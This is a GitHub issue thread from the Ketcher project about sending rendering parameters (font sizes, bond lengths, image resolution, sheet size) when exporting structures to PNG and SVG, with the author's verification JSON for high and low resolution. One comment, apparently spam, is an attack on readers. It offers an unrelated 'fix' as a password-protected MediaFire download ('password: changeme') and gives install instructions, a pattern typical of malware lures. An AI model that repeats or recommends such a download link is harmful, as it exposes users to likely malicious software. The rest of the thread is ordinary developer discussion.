### ISSUE TITLE
Sending ACS parameters when requesting render to PNG and SVG

### ISSUE THREAD

**Issue by AnnaKosol** [epam/ketcher#5362]
**Background**
Related issue: https://github.com/epam/ketcher/issues/5152, https://github.com/epam/Indigo/issues/2246 and https://github.com/epam/Indigo/issues/2175

**Solution**
the following parameters should be sent when requesting `render` function (save as PNG, SVG):

`render-coloring` (send atomColoring)
`render-font-size`
`render-font-size-unit`
`render-font-size-sub`
`render-font-size-sub-unit`
`image-resolution` (int number, default 72 ) 
`bond-length-unit`
`bond-length`
`render-bond-thickness`
`render-bond-thickness-unit`

`render-bond-spacing` (default = 0.18 i.e. bondLength * 0.18)
`render-stereo-bond-width`
`render-stereo-bond-width-unit`
`render-hash-spacing`
`render-hash-spacing-unit`

Send the following parameters only if `image-resolution` = high
`render-output-sheet-width` (default value: Letter format width = 11 inches)
`render-output-sheet-height` (default value: Letter format height = 8.5 inches)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnnaKosol** [comment]
Verified

![Image](https://github.com/user-attachments/assets/b09fdf15-b515-4a0c-985b-380735b08352)

for high resolution
`{
    "dearomatize-on-load": false,
    "smart-layout": true,
    "ignore-stereochemistry-errors": true,
    "mass-skip-error-on-pseudoatoms": false,
    "gross-formula-add-rsites": true,
    "gross-formula-add-isotopes": true,
    "ignore-no-chiral-flag": false,
    "aromatize-skip-superatoms": true,
    "render-label-mode": "terminal-hetero",
    "render-coloring": false,
    "render-font-size": 10,
    "render-font-size-unit": "pt",
    "render-font-size-sub": 10,
    "render-font-size-sub-unit": "pt",
    "image-resolution": 600,
    "bond-length-unit": "pt",
    "bond-length": 14.4,
    "render-bond-thickness": 0.6,
    "render-bond-thickness-unit": "pt",
    "render-bond-spacing": 0.18,
    "render-stereo-bond-width": 2,
    "render-stereo-bond-width-unit": "pt",
    "render-hash-spacing": 2.5,
    "render-hash-spacing-unit": "pt",
    "render-output-sheet-width": 11,
    "render-output-sheet-height": 8.5
}`

for low resolution
`{
    "dearomatize-on-load": false,
    "smart-layout": true,
    "ignore-stereochemistry-errors": true,
    "mass-skip-error-on-pseudoatoms": false,
    "gross-formula-add-rsites": true,
    "gross-formula-add-isotopes": true,
    "ignore-no-chiral-flag": false,
    "aromatize-skip-superatoms": true,
    "render-label-mode": "terminal-hetero",
    "render-coloring": false,
    "render-font-size": 10,
    "render-font-size-unit": "pt",
    "render-font-size-sub": 10,
    "render-font-size-sub-unit": "pt",
    "image-resolution": 72,
    "bond-length-unit": "pt",
    "bond-length": 14.4,
    "render-bond-thickness": 0.6,
    "render-bond-thickness-unit": "pt",
    "render-bond-spacing": 0.18,
    "render-stereo-bond-width": 2,
    "render-stereo-bond-width-unit": "pt",
    "render-hash-spacing": 2.5,
    "render-hash-spacing-unit": "pt"
}`

**Environment**
https://rc.test.lifescience.opensource.epam.com/KetcherDemoSA/index.html
Ketcher Version 2.26.0-rc.1 Build at 2024-10-04; 18:45:04
Indigo Version 1.25.0-rc.1.0-g704673fcb-wasm32-wasm-clang-19.0.0
MacOs
Chrome 129.0.6668.71 (Official Build) (arm64)
